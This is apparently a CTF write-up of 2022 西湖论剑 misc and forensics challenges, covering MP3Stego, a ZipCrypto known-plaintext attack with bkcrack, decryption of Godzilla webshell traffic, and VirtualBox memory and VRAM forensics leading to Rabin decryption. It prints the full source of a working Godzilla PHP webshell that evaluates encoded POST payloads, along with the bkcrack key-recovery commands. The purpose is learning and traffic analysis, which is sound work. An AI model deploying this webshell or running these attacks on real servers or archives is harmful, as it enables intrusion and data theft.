2022 西湖论剑 MISC challenges, reproduced

强网杯 is about to start, so I wanted to reproduce some forensics and misc challenges. The 2022 西湖论剑 set has both, and the difficulty is fairly high.

MISC

mp3

We get cipher.mp3. Listening to it, anyone who has seen it before will immediately recognize it as the default MP3Stego encoded audio. There is no password yet, so first look at the file in 010 Editor.

A PNG is embedded in it; carve it out with foremost.

The result is a PNG made up only of black and white pixels.

Convert it row by row into a string of 0/1 bits, pack every 8 bits into a byte, and save the result as a file to see what it is:

```python
from PIL import Image
import struct

# Convert to 8-bit grayscale so getpixel() returns a single 0..255 value
# (a '1'-mode or RGB image would otherwise break the division below)
img = Image.open('00000646.png').convert('L')
width, height = img.size

f = open('flag', 'wb')

flag = ''
# read row by row: white (255) -> '1', black (0) -> '0'
for y in range(height):
    for x in range(width):
        flag += str(img.getpixel((x, y)) // 255)  # 255//255 = 1 ; 0//255 = 0
# print(flag)
# pack every 8 bits into one byte
for i in range(0, len(flag), 8):
    f.write(struct.pack('B', int(flag[i:i+8], 2)))
f.close()
```

The output starts with 50 4B 03 04, so it is a zip, and it contains an encrypted 47.txt.

It is not a pseudo-encrypted zip (the encryption flag is real). Back to MP3Stego: decoding with an empty password gives the archive password 8750d5109208213f.

Extracting gives 47.txt:

```text
2lO,.j2lL000iZZ2[2222iWP,.ZQQX,2.[002iZZ2[2020iWP,.ZQQX,2.[020iZZ2[2022iWLNZQQX,2.[2202iW2,2.ZQQX,2.[022iZZ2[2220iWPQQZQQX,2.[200iZZ2[202iZZ2[2200iWLNZQQX,2.[220iZZ2[222iZZ2[2000iZZ2[2002iZZ2Nj2]20lW2]20l2ZQQX,2]202.ZW2]02l2]20,2]002.XZW2]22lW2]2ZQQX,2]002.XZWWP2XZQQX,2]022.ZW2]00l2]20,2]220.XZW2]2lWPQQZQQX,2]002.XZW2]0lWPQQZQQX,2]020.XZ2]20,2]202.Z2]00Z2]02Z2]2j2]22l2]2ZWPQQZQQX,2]022.Z2]00Z2]0Z2]2Z2]22j2]2lW2]000X,2]20.,2]20.j2]2W2]2W2]22ZQ-QQZ2]2020ZWP,.ZQQX,2]020.Z2]2220ZQ--QZ2]002Z2]220Z2]020Z2]00ZQW---Q--QZ2]002Z2]000Z2]200ZQ--QZ2]002Z2]000Z2]002ZQ--QZ2]002Z2]020Z2]022ZQ--QZ2]002Z2]000Z2]022ZQ--QZ2]002Z2]020Z2]200ZQ--QZ2]002Z2]000Z2]220ZQLQZ2]2222Z2]2000Z2]000Z2]2002Z2]222Z2]020Z2]202Z2]222Z2]2202Z2]220Z2]2002Z2]2002Z2]2202Z2]222Z2]2222Z2]2202Z2]2022Z2]2020Z2]222Z2]2220Z2]2002Z2]222Z2]2020Z2]002Z2]202Z2]2200Z2]200Z2]2222Z2]2002Z2]200Z2]2022Z2]200ZQN---Q--QZ2]200Z2]000ZQXjQZQ-QQXWXXWXj
```

The 47 in the file name points to ROT47.

The decoded text looks like jjencode; pasting it into the browser console and evaluating it gives the flag: DASCTF{f8097257d699d7fdba7e97a15c4f94b4}
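The ROT47 step, as an added example (this is not the writeup's own code): ROT47 rotates every printable ASCII character by 47 positions within 0x21..0x7E, so applying it twice returns the original. The sample below is the beginning of 47.txt as quoted above; decoding it yields the characteristic jjencode prologue, where a variable is aliased to `~[]` (which is -1) and an object of underscore-named keys is built up. The `looks_like_jjencode` heuristic is my own and only recognizes that prologue; it does not evaluate the JavaScript.

```python
# Added example (not the writeup's own code): decode 47.txt with ROT47 and
# recognize the jjencode prologue in the result.

# Constructed sample: the beginning of 47.txt as shown in the writeup
SAMPLE_47 = "2lO,.j2lL000iZZ2[2222iWP,.ZQQX,2.[002iZZ2[2020iWP,.ZQQX,2.[020iZZ2[2022iWLNZQQX"


def rot47(text: str) -> str:
    """Rotate printable ASCII (0x21..0x7E) by 47; other characters pass through."""
    out = []
    for ch in text:
        code = ord(ch)
        if 33 <= code <= 126:
            out.append(chr(33 + (code - 33 + 47) % 94))
        else:
            out.append(ch)
    return "".join(out)


def looks_like_jjencode(js: str) -> bool:
    """Heuristic: jjencode output opens with `<v>=~[];<v>={___:++<v>,...`."""
    return "=~[];" in js[:16] and "{___:++" in js


if __name__ == "__main__":
    decoded = rot47(SAMPLE_47)
    print(decoded)
    print("jjencode-style:", looks_like_jjencode(decoded))
```

The decoded prologue for this file is `a=~[];a={___:++a,aaaa:(![]+"")[a],...`, i.e. jjencode with the global variable named `a` instead of the usual `$`, which is why evaluating the whole blob in a console produces the flag.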

take_the_zip_easy

We get zipeasy.zip, which contains two encrypted files. The two file names are the same, so I guessed that the inner zip was produced by compressing the pcapng and that the encryption is ZipCrypto. Two ranges of its plaintext are then probably known: bytes 30-43 are the file name 64 61 73 66 6C 6F 77 2E 70 63 61 70 6E 67 (dasflow.pcapng), and bytes 0-3 are the local file header signature 50 4B 03 04.
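Why those particular bytes are predictable, shown as an added example (not the writeup's own code): a ZIP local file header is exactly 30 bytes (4-byte `PK\x03\x04` signature plus fixed-width fields), and the file name follows it immediately, so an attacker who can guess the first entry's name knows plaintext at offsets 0 and 30 without ever seeing the file. This is the structural weakness that makes ZipCrypto unsuitable for anything sensitive; AES-encrypted zips do not leak a known header this way. The script builds an unencrypted stored zip in memory as a stand-in for the inner dasflow.zip and derives the `-x` arguments used above. The `enough_for_bkcrack` check encodes bkcrack's stated minimum of 12 known bytes with 8 of them contiguous.

```python
# Added example (not the writeup's own code): derive the known-plaintext
# offsets of a ZIP entry from the ZIP local file header layout.
import io
import struct
import zipfile

LOCAL_HEADER_SIG = b"PK\x03\x04"
LOCAL_HEADER_LEN = 30  # fixed part of the local file header; file name follows


def build_inner_zip(name: str, data: bytes) -> bytes:
    """Constructed sample: an unencrypted, stored ZIP standing in for dasflow.zip."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_STORED) as zf:
        zf.writestr(name, data)
    return buf.getvalue()


def known_plaintext_segments(inner_zip: bytes) -> list:
    """Return (offset, hex) pairs for bytes the ZIP structure alone reveals."""
    if inner_zip[:4] != LOCAL_HEADER_SIG:
        raise ValueError("not a ZIP local file header")
    # bytes 26..27 hold the file name length as a little-endian uint16
    (name_len,) = struct.unpack_from("<H", inner_zip, 26)
    name = inner_zip[LOCAL_HEADER_LEN:LOCAL_HEADER_LEN + name_len]
    return [(0, LOCAL_HEADER_SIG.hex()), (LOCAL_HEADER_LEN, name.hex())]


def bkcrack_args(segments) -> str:
    """Render the segments as bkcrack -x <offset> <hex> arguments."""
    return " ".join(f"-x {off} {hx}" for off, hx in segments)


def enough_for_bkcrack(segments) -> bool:
    """bkcrack needs at least 12 bytes of known plaintext, 8 of them contiguous."""
    sizes = [len(hx) // 2 for _, hx in segments]
    return sum(sizes) >= 12 and max(sizes) >= 8


if __name__ == "__main__":
    # constructed pcapng-like content; only the header bytes matter here
    sample = build_inner_zip("dasflow.pcapng", b"\x0a\x0d\x0d\x0a" + b"\x00" * 64)
    segs = known_plaintext_segments(sample)
    print(bkcrack_args(segs), "| sufficient:", enough_for_bkcrack(segs))
```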

Try a known-plaintext attack:

```shell
bkcrack.exe -C zipeasy.zip -x 30 646173666C6F772E706361706E67 -x 0 504B0304 -c dasflow.zip
```

```text
bkcrack 1.5.0 - 2022-07-07
[19:36:43] Z reduction using 6 bytes of known plaintext
100.0 % (6 / 6)
[19:36:43] Attack on 1038290 Z values at index 37
Keys: 2b7d78f3 0ebcabad a069728c
67.7 % (703384 / 1038290)
[19:41:03] Keys
2b7d78f3 0ebcabad a069728c
```

```shell
bkcrack.exe -C zipeasy.zip -c dasflow.zip -k 2b7d78f3 0ebcabad a069728c -d dasflow.zip
```

This gives dasflow.zip; extracting it gives dasflow.pcapng.

A quick look shows this is clearly Godzilla (哥斯拉) webshell traffic, and there is a flag.zip inside as well. Stream 6 contains the original webshell, and the key can be read from it: d8ea7326e6ec5916.

```php
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
// Godzilla PHP_XOR_BASE64 shell: every byte is XORed with $K[($i+1)&15]
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='air123';
$payloadName='payload';
$key='d8ea7326e6ec5916';
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
        eval($payload);
        // response = md5(pass.key)[0..16] . base64(xor(result)) . md5(pass.key)[16..]
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}
```

Decrypting the Godzilla traffic in stream 36 gives the original command that encrypted flag.zip, with the password airDAS1231qaSW@.

Writing a script to decrypt it also works:

```php
<?php
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$key='d8ea7326e6ec5916';

$endata = 'J%2B5pNzMyNmU2mij7dMD%2FqHMAa1dTUh6rZrUuY2l7eDVot058H%2BAZShmyrB3w%2FOdLFa2oeH%2FjYdeYr09l6fxhLPMsLeAwg8MkGmC%2BNbz1%2BkYvogF0EFH1p%2FKFEzIcNBVfDaa946G%2BynGJob9hH1%2BWlZFwyP79y4%2FcvxxKNVw8xP1OZWE3';
// urldecode() turns a literal '+' into a space, which breaks base64 decoding, so put the '+' back
$dedata = gzdecode(encode(base64_decode(str_replace(' ','+',urldecode($endata))), $key));
echo $dedata;

// output:
// cmdLinePsh -c "cd "/var/www/html/upload/";zip -o flag.zip /flag -P airDAS1231qaSW@" 2>&1methodNameexecCommand
```
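The same transform in Python, as an added example (not the writeup's or Godzilla's own code), so that request and response bodies pulled from a pcap can be decoded offline without running PHP. Two details from the PHP above are made explicit: `$K[$i+1&15]` parses as `$K[($i+1)&15]`, so the key stream starts at key byte 1; and `urllib.parse.unquote` does not turn `+` into a space (unlike PHP's `urldecode` and Python's `unquote_plus`), which avoids the replace workaround. The two MD5 halves that wrap every response are fixed for a given password and key, which makes them a convenient per-shell detection signature. The constants are the ones read from the captured webshell; the captured request value from the writeup is passed through in `main`, while the assertions use constructed round-trip data.

```python
# Added example (not the writeup's own code): Godzilla PHP_XOR_BASE64
# request/response codec in Python, for decoding captured traffic offline.
import base64
import gzip
import hashlib
from urllib.parse import unquote

KEY = "d8ea7326e6ec5916"   # key from the webshell source (stream 6)
PASS = "air123"            # POST parameter name from the webshell source

# Captured request value quoted in the writeup (URL-encoded base64)
CAPTURED = ("J%2B5pNzMyNmU2mij7dMD%2FqHMAa1dTUh6rZrUuY2l7eDVot058H%2BAZShmyrB3w"
            "%2FOdLFa2oeH%2FjYdeYr09l6fxhLPMsLeAwg8MkGmC%2BNbz1%2BkYvogF0EFH1p"
            "%2FKFEzIcNBVfDaa946G%2BynGJob9hH1%2BWlZFwyP79y4%2FcvxxKNVw8xP1OZWE3")


def godzilla_xor(data: bytes, key: str) -> bytes:
    """Byte-wise XOR with key[(i+1) & 15]; the PHP `$K[$i+1&15]` means ($i+1)&15."""
    k = key.encode()
    return bytes(b ^ k[(i + 1) & 15] for i, b in enumerate(data))


def decode_request(form_value: str, key: str = KEY) -> bytes:
    """URL-decode, base64-decode, XOR, then gunzip: the shell's `gzdecode(encode(base64_decode(...)))`.
    unquote() leaves '+' alone, so base64 characters survive intact."""
    raw = base64.b64decode(unquote(form_value))
    return gzip.decompress(godzilla_xor(raw, key))


def encode_request(plain: bytes, key: str = KEY) -> str:
    """Inverse of decode_request (what the Godzilla client sends), used for round-trips."""
    return base64.b64encode(godzilla_xor(gzip.compress(plain), key)).decode()


def response_markers(password: str = PASS, key: str = KEY) -> tuple:
    """md5(pass+key) split in half: the shell prefixes and suffixes every response with these."""
    h = hashlib.md5((password + key).encode()).hexdigest()
    return h[:16], h[16:]


def encode_response(body: bytes, password: str = PASS, key: str = KEY) -> str:
    """What the shell emits: head + base64(xor(body)) + tail."""
    head, tail = response_markers(password, key)
    return head + base64.b64encode(godzilla_xor(body, key)).decode() + tail


def strip_response(body: str, password: str = PASS, key: str = KEY) -> bytes:
    """Check the markers and undo base64 + XOR; the payload's run() decides any further encoding."""
    head, tail = response_markers(password, key)
    if not (body.startswith(head) and body.endswith(tail)):
        raise ValueError("response markers not found; wrong password/key or not this shell")
    return godzilla_xor(base64.b64decode(body[len(head):-len(tail)]), key)


if __name__ == "__main__":
    try:
        print(decode_request(CAPTURED).decode("latin-1"))
    except Exception as exc:  # the quoted value may not survive copy/paste intact
        print("could not decode captured value:", exc)
    print("response markers:", response_markers())
```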

Export flag.zip and extract it to get the flag.

Forensics

Isolated Machine Memory Analysis

References: zysgmzb, 空白

Challenge description

Zhang San, now going by the name Charlie, works at a foreign company on flag encryption research. To prevent the flag from leaking, the company enforces a strict security policy: the flag must never leave the R&D server, and logging in to the server must go through a jump host. Zhang San's jump host is a virtual machine; it is fully disk-encrypted, so nothing can be extracted from the disk, but the good news is that at least it has not been shut down yet. Disclaimer: all person names, organization names, product names, domain names and IP addresses in this challenge are fictional; any resemblance is coincidental. Note: this challenge simulates a real R&D environment; information relevant to solving it will not appear in unreasonable places such as person names, domain names or IP addresses. Link: https://pan.baidu.com/s/1WESej-pyjWKZni7drZGTig?pwd=cq46 Extraction code: cq46

Hint

Hint 1: a screenshot was found on Zhang San's computer; it looks like it was left behind accidentally while configuring the jump host.

Hint 2: why is this Windows memory image in ELF format? Hint 3: https://github.com/volatilityfoundation/volatility/wiki/Virtual-Box-Core-Dump#meta-data

A forensics challenge, but what we get is an ELF:

```shell
volatility_2.6_win64_standalone.exe -f CharlieBrown-PC.elf imageinfo
```

```text
Volatility Foundation Volatility Framework 2.6
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_23418
```

```shell
volatility_2.6_win64_standalone.exe -f CharlieBrown-PC.elf --profile=Win7SP1x64 pslist
```

Skipping the rest, the important processes are these: VBoxTray is the VirtualBox equivalent of VMware Tools, VBoxService confirms the guest runs under VirtualBox, mstsc indicates a Remote Desktop session, and ClipboardMonit means the clipboard was used.

```text
Volatility Foundation Volatility Framework 2.6
Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
...
0xfffffa8004d307a0 VBoxService.ex 648 460 13 116 0 0 2022-11-02 07:10:56 UTC+0000
...
0xfffffa800384d9b0 VBoxTray.exe 1884 300 12 138 1 0 2022-11-01 16:12:09 UTC+0000
...
0xfffffa8003854b00 ClipboardMonit 1516 300 1 47 1 0 2022-11-01 16:12:09 UTC+0000
...
0xfffffa80050f2b00 mstsc.exe 2840 300 14 715 1 0 2022-11-01 16:12:35 UTC+0000
...
```

First look at the clipboard contents:

```shell
volatility_2.6_win64_standalone.exe -f CharlieBrown-PC.elf --profile=Win7SP1x64 clipboard
```

```text
Volatility Foundation Volatility Framework 2.6
Session WindowStation Format Handle Object Data
---------- ------------- ------------------ ------------------ ------------------ --------------------------------------------------
1 WinSta0 0xc009L 0x901c1 0xfffff900c00e26b0
1 WinSta0 CF_TEXT 0x7400000001 ------------------
1 WinSta0 CF_UNICODETEXT 0x7021f 0xfffff900c1df7970 -----BEGIN PUBLIC KEY---...----END PUBLIC KEY-----
1 WinSta0 CF_TEXT 0x0 ------------------
1 WinSta0 CF_LOCALE 0x0 ------------------
1 WinSta0 0x0L 0x0 ------------------
1 ------------- ------------------ 0x901a3 0xfffff900c01f2cc0
```

There is a data entry starting with an RSA public key header; add -v to see the full contents:

```text
Volatility Foundation Volatility Framework 2.6
Session WindowStation Format Handle Object Data
---------- ------------- ------------------ ------------------ ------------------ --------------------------------------------------
1 WinSta0 0xc009L 0x901c1 0xfffff900c00e26b0
0xfffff900c00e26c4 5e 01 03 00 00 00 00 00 ^.......
1 WinSta0 CF_TEXT 0x7400000001 ------------------
1 WinSta0 CF_UNICODETEXT 0x7021f 0xfffff900c1df7970 -----BEGIN PUBLIC KEY---...----END PUBLIC KEY-----
0xfffff900c1df7984 2d 00 2d 00 2d 00 2d 00 2d 00 42 00 45 00 47 00 -.-.-.-.-.B.E.G.
0xfffff900c1df7994 49 00 4e 00 20 00 50 00 55 00 42 00 4c 00 49 00 I.N...P.U.B.L.I.
0xfffff900c1df79a4 43 00 20 00 4b 00 45 00 59 00 2d 00 2d 00 2d 00 C...K.E.Y.-.-.-.
0xfffff900c1df79b4 2d 00 2d 00 0d 00 0a 00 4d 00 46 00 6f 00 77 00 -.-.....M.F.o.w.
0xfffff900c1df79c4 44 00 51 00 59 00 4a 00 4b 00 6f 00 5a 00 49 00 D.Q.Y.J.K.o.Z.I.
0xfffff900c1df79d4 68 00 76 00 63 00 4e 00 41 00 51 00 45 00 42 00 h.v.c.N.A.Q.E.B.
0xfffff900c1df79e4 42 00 51 00 41 00 44 00 53 00 51 00 41 00 77 00 B.Q.A.D.S.Q.A.w.
0xfffff900c1df79f4 52 00 67 00 4a 00 42 00 41 00 49 00 45 00 5a 00 R.g.J.B.A.I.E.Z.
0xfffff900c1df7a04 54 00 78 00 78 00 6c 00 65 00 37 00 2b 00 35 00 T.x.x.l.e.7.+.5.
0xfffff900c1df7a14 72 00 79 00 77 00 43 00 35 00 62 00 79 00 49 00 r.y.w.C.5.b.y.I.
0xfffff900c1df7a24 75 00 42 00 6b 00 50 00 68 00 77 00 6b 00 79 00 u.B.k.P.h.w.k.y.
0xfffff900c1df7a34 76 00 35 00 37 00 52 00 0d 00 0a 00 37 00 35 00 v.5.7.R.....7.5.
0xfffff900c1df7a44 36 00 44 00 55 00 43 00 44 00 39 00 69 00 32 00 6.D.U.C.D.9.i.2.
0xfffff900c1df7a54 4d 00 57 00 59 00 79 00 55 00 73 00 30 00 41 00 M.W.Y.y.U.s.0.A.
0xfffff900c1df7a64 63 00 63 00 36 00 4a 00 5a 00 77 00 79 00 71 00 c.c.6.J.Z.w.y.q.
0xfffff900c1df7a74 56 00 4f 00 6d 00 52 00 37 00 34 00 75 00 4d 00 V.O.m.R.7.4.u.M.
0xfffff900c1df7a84 76 00 72 00 65 00 49 00 32 00 73 00 6c 00 6c 00 v.r.e.I.2.s.l.l.
0xfffff900c1df7a94 65 00 34 00 47 00 79 00 37 00 48 00 6c 00 36 00 e.4.G.y.7.H.l.6.
0xfffff900c1df7aa4 50 00 63 00 58 00 78 00 45 00 43 00 41 00 51 00 P.c.X.x.E.C.A.Q.
0xfffff900c1df7ab4 49 00 3d 00 0d 00 0a 00 2d 00 2d 00 2d 00 2d 00 I.=.....-.-.-.-.
0xfffff900c1df7ac4 2d 00 45 00 4e 00 44 00 20 00 50 00 55 00 42 00 -.E.N.D...P.U.B.
0xfffff900c1df7ad4 4c 00 49 00 43 00 20 00 4b 00 45 00 59 00 2d 00 L.I.C...K.E.Y.-.
0xfffff900c1df7ae4 2d 00 2d 00 2d 00 2d 00 00 00 -.-.-.-...
```

Stripping the UTF-16 padding gives the public key. It is not useful yet, so set it aside and look at the rest:

```text
-----BEGIN PUBLIC KEY-----
MFowDQYJKoZIhvcNAQEBBQADSQAwRgJBAIEZTxxle7+5rywC5byIuBkPhwkyv57R
756DUCD9i2MWYyUs0Acc6JZwyqVOmR74uMvreI2slle4Gy7Hl6PcXxECAQI=
-----END PUBLIC KEY-----
```

Take a screenshot of the desktop:

```shell
volatility_2.6_win64_standalone.exe -f CharlieBrown-PC.elf --profile=Win7SP1x64 screenshot -D ./
```

A MAC address is visible at the top.

Use netscan to look at the network connections:

```shell
volatility_2.6_win64_standalone.exe -f CharlieBrown-PC.elf --profile=Win7SP1x64 netscan
```

```text
Volatility Foundation Volatility Framework 2.6
...
0x11e73f010 TCPv6 fc00:19e9:ee8a:7784:645a:2b7a:f7ab:64:49158 fc00:19e9:ee8a:7784:645a:2b7a:f7ab:4:3389 ESTABLISHED -1
...
```

From the challenge description we can guess that this is the connection between the jump host and the R&D server (port 3389 is RDP).

Look at the Remote Desktop session. First try to find the .bmc bitmap cache files; the principle is explained at https://www.hetianlab.com/specialized/20210713143551

```cmd
volatility_2.6_win64_standalone.exe -f CharlieBrown-PC.elf --profile=Win7SP1x64 filescan | findstr ".bmc"
```

```text
Volatility Foundation Volatility Framework 2.6
0x00000000085889e0 17 1 RW-r-- \Device\HarddiskVolume2\Users\Charlie Brown\AppData\Local\Microsoft\Terminal Server Client\Cache\bcache24.bmc
0x000000011fed52a0 14 0 R--rw- \Device\HarddiskVolume2\Users\Charlie Brown\AppData\Local\Microsoft\Terminal Server Client\Cache\bcache24.bmc
```

But after dumping the file, no images can be carved out of it.

So use memdump to save the memory of mstsc.exe (PID 2840) to disk:

```shell
volatility_2.6_win64_standalone.exe -f CharlieBrown-PC.elf --profile=Win7SP1x64 memdump -p 2840 -D ./
```

```text
Volatility Foundation Volatility Framework 2.6
************************************************************************
Writing mstsc.exe [ 2840] to 2840.dmp
```

Rename the dump with a .data extension and tune the raw-image parameters in GIMP; all we get is a hint that the screen contents are not in RAM.

Looking back at hint 1, the screenshot shows the VBox display resolution, graphics adapter and similar settings.

Then, following hint 3 (https://github.com/volatilityfoundation/volatility/wiki/Virtual-Box-Core-Dump#meta-data),

the screen contents are probably in VRAM.

Use vboxinfo to find the memory layout of the core dump:

```shell
volatility_2.6_win64_standalone.exe -f CharlieBrown-PC.elf --profile=Win7SP1x64 vboxinfo
```

```text
Volatility Foundation Volatility Framework 2.6
Magic: 0xc01ac0de
Format: 0x10006
VirtualBox 7.0.2 (revision 154219)
CPUs: 2

FileOffset Memory Offset Size
0x4a2c 0x0 0xa0000
0xa4a2c 0xc0000 0x9000
0xada2c 0xe0000 0x1000
0xaea2c 0xe1000 0x1000
0xafa2c 0xe2000 0xe000
0xbda2c 0xf0000 0x10000
0xcda2c 0x100000 0x100000
0x1cda2c 0x200000 0xdfe00000
0xdffcda2c 0xe0000000 0x2000000
0xe1fcda2c 0xf0000000 0x200000
0xe21cda2c 0xf0400000 0x400000
0xe25cda2c 0xf0800000 0x4000
0xe25d1a2c 0xffff0000 0x10000
0xe25e1a2c 0x100000000 0x20000000
```

Hint 3 tells us where the VRAM lives:

"The VGA/video memory begins at 0xe0000000 on both x86 and x64 systems."

The matching row of the vboxinfo output is:

```text
0xdffcda2c 0xe0000000 0x2000000
```

So the file offset is 0xdffcda2c and the size is 0x2000000.

The video memory can be extracted manually or with dd:

```shell
dd if=CharlieBrown-PC.elf of=vram skip=3757890092 bs=1 count=33554432
```

Doing it manually is recommended; dd with bs=1 takes a very long time.
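The region lookup and the extraction itself, as an added example (not the writeup's own code): it parses the vboxinfo table quoted above, finds the region that contains guest-physical address 0xe0000000, and copies it out with `seek()`/`read()` in 1 MiB chunks, which is exactly what the dd command does but without the byte-at-a-time cost of `bs=1`. The `VBOXINFO_OUTPUT` text is a constructed subset of the table shown above, and `demo_extract_roundtrip` runs the copy against a small constructed file rather than the real core dump.

```python
# Added example (not the writeup's own code): pick the VRAM region out of the
# vboxinfo table and copy it from the core dump with seek()/read().
import os
import tempfile

VGA_MEMORY_BASE = 0xE0000000  # guest-physical start of video memory, per the Volatility wiki

# Constructed sample: a few rows of the vboxinfo output shown above
VBOXINFO_OUTPUT = """\
FileOffset Memory Offset Size
0x4a2c 0x0 0xa0000
0x1cda2c 0x200000 0xdfe00000
0xdffcda2c 0xe0000000 0x2000000
0xe1fcda2c 0xf0000000 0x200000
"""


def parse_vboxinfo(text: str) -> list:
    """Return (file_offset, memory_offset, size) triples from vboxinfo's table."""
    regions = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 3 and all(p.startswith("0x") for p in parts):
            regions.append(tuple(int(p, 16) for p in parts))
    return regions


def find_region(regions, memory_offset: int) -> tuple:
    """File offset and remaining size of the region containing memory_offset."""
    for file_off, mem_off, size in regions:
        if mem_off <= memory_offset < mem_off + size:
            delta = memory_offset - mem_off
            return file_off + delta, size - delta
    raise LookupError(f"no region contains 0x{memory_offset:x}")


def extract_region(dump_path: str, file_offset: int, size: int, out_path: str,
                   chunk: int = 1 << 20) -> int:
    """Copy `size` bytes starting at `file_offset` into out_path; returns bytes written."""
    written = 0
    with open(dump_path, "rb") as src, open(out_path, "wb") as dst:
        src.seek(file_offset)
        while written < size:
            buf = src.read(min(chunk, size - written))
            if not buf:
                break  # dump is truncated: report what was actually copied
            dst.write(buf)
            written += len(buf)
    return written


def dd_command(dump_path: str, file_offset: int, size: int, out_path: str) -> str:
    """Equivalent dd invocation, for comparison with the one in the writeup."""
    return f"dd if={dump_path} of={out_path} skip={file_offset} bs=1 count={size}"


def demo_extract_roundtrip() -> bool:
    """Self-check on a constructed dump file: extract a slice and compare it."""
    data = bytes(range(256)) * 4
    with tempfile.TemporaryDirectory() as d:
        src, dst = os.path.join(d, "dump.elf"), os.path.join(d, "vram")
        with open(src, "wb") as f:
            f.write(data)
        n = extract_region(src, 100, 300, dst)
        with open(dst, "rb") as f:
            return n == 300 and f.read() == data[100:400]


if __name__ == "__main__":
    regions = parse_vboxinfo(VBOXINFO_OUTPUT)
    off, size = find_region(regions, VGA_MEMORY_BASE)
    print(f"VRAM at file offset 0x{off:x}, size 0x{size:x}")
    print(dd_command("CharlieBrown-PC.elf", off, size, "vram"))
    # extract_region("CharlieBrown-PC.elf", off, size, "VRAM")  # run this on the real dump
```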

Save the extracted data as VRAM. Inspecting it, the bytes come in groups of 4 representing RGBA. With the width and height taken from the resolution in hint 1, write a script to turn the data into an image:

```python
from PIL import Image

# resolution taken from the screenshot in hint 1
width = 1440
height = 900
flag = open('VRAM', 'rb').read()

def makeSourceImg():
    img = Image.new('RGBA', (width, height))
    x = 0
    # 4 bytes per pixel, rows from top to bottom
    for i in range(height):
        for j in range(width):
            img.putpixel((j, i), (flag[x], flag[x + 1], flag[x + 2], flag[x + 3]))
            x += 4
    return img

img = makeSourceImg()
img.save('1.png')
```

This gives a PNG, which is the screen of the Remote Desktop session seen earlier.

From it we read c:

```text
089ebf3622f6f6d498c1b5ecfe4d831d3e876bf55578586389127e0053bb4fe006e2eee5398b86274fdce0418d16c9bb0bf24922cec491b3047d33eb661784c9
```

What remains is the RSA decryption.

Parse the public key on the online tool http://www.hiencode.com/pub_asys.html to get n and e; n can be factored directly into p and q.

e=2, so this is Rabin rather than plain RSA: decryption yields four square roots of c, and the correct plaintext is the one that decodes to readable bytes.
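The last two steps done offline, as an added example (not the writeup's own code): a minimal hand-written DER walker extracts n and e from the clipboard PEM (replacing the online parser), and `rabin_roots` computes all four square roots of c modulo n by CRT, which is what "e=2, Rabin" amounts to. The factors p and q are not given on the page, so they are left as a placeholder, and the demonstration runs on constructed primes (both 3 mod 4, the case the helper handles); on the real challenge you would substitute the factors of n. The PEM and c are the values recovered above.

```python
# Added example (not the writeup's own code): read n and e out of the PEM
# public key, then recover Rabin (e = 2) plaintext candidates from p and q.
import base64

# Public key as cleaned up from the clipboard dump
PUBLIC_KEY_PEM = """-----BEGIN PUBLIC KEY-----
MFowDQYJKoZIhvcNAQEBBQADSQAwRgJBAIEZTxxle7+5rywC5byIuBkPhwkyv57R
756DUCD9i2MWYyUs0Acc6JZwyqVOmR74uMvreI2slle4Gy7Hl6PcXxECAQI=
-----END PUBLIC KEY-----"""

# Ciphertext c read off the recovered Remote Desktop screen
C_HEX = ("089ebf3622f6f6d498c1b5ecfe4d831d3e876bf55578586389127e0053bb4fe0"
         "06e2eee5398b86274fdce0418d16c9bb0bf24922cec491b3047d33eb661784c9")


def _der_read(buf: bytes, pos: int) -> tuple:
    """Read one DER TLV at pos; returns (tag, value, next_pos). Handles long-form lengths."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def parse_rsa_public_key(pem: str) -> tuple:
    """SubjectPublicKeyInfo ::= SEQUENCE { AlgorithmIdentifier, BIT STRING { RSAPublicKey } }
    RSAPublicKey ::= SEQUENCE { modulus INTEGER, publicExponent INTEGER }"""
    b64 = "".join(l for l in pem.strip().splitlines() if not l.startswith("-----"))
    der = base64.b64decode(b64)
    tag, spki, _ = _der_read(der, 0)
    if tag != 0x30:
        raise ValueError("expected SEQUENCE")
    _, _alg, pos = _der_read(spki, 0)          # AlgorithmIdentifier, skipped
    tag, bitstr, _ = _der_read(spki, pos)      # BIT STRING; first byte = unused bits
    if tag != 0x03 or bitstr[0] != 0:
        raise ValueError("unexpected BIT STRING")
    _, rsa, _ = _der_read(bitstr, 1)           # RSAPublicKey SEQUENCE
    t1, n_bytes, pos = _der_read(rsa, 0)
    t2, e_bytes, _ = _der_read(rsa, pos)
    if t1 != 0x02 or t2 != 0x02:
        raise ValueError("expected two INTEGERs")
    return int.from_bytes(n_bytes, "big"), int.from_bytes(e_bytes, "big")


def rabin_roots(c: int, p: int, q: int) -> list:
    """All four square roots of c modulo p*q for primes p, q = 3 (mod 4).
    sqrt mod a prime r = 3 (mod 4) is c^((r+1)/4); the roots are combined by CRT."""
    if p % 4 != 3 or q % 4 != 3:
        raise ValueError("this helper handles p, q = 3 (mod 4) only")
    n = p * q
    mp, mq = pow(c, (p + 1) // 4, p), pow(c, (q + 1) // 4, q)
    yp, yq = pow(p, -1, q), pow(q, -1, p)      # p^-1 mod q, q^-1 mod p
    roots = set()
    for sp in (mp, p - mp):
        for sq in (mq, q - mq):
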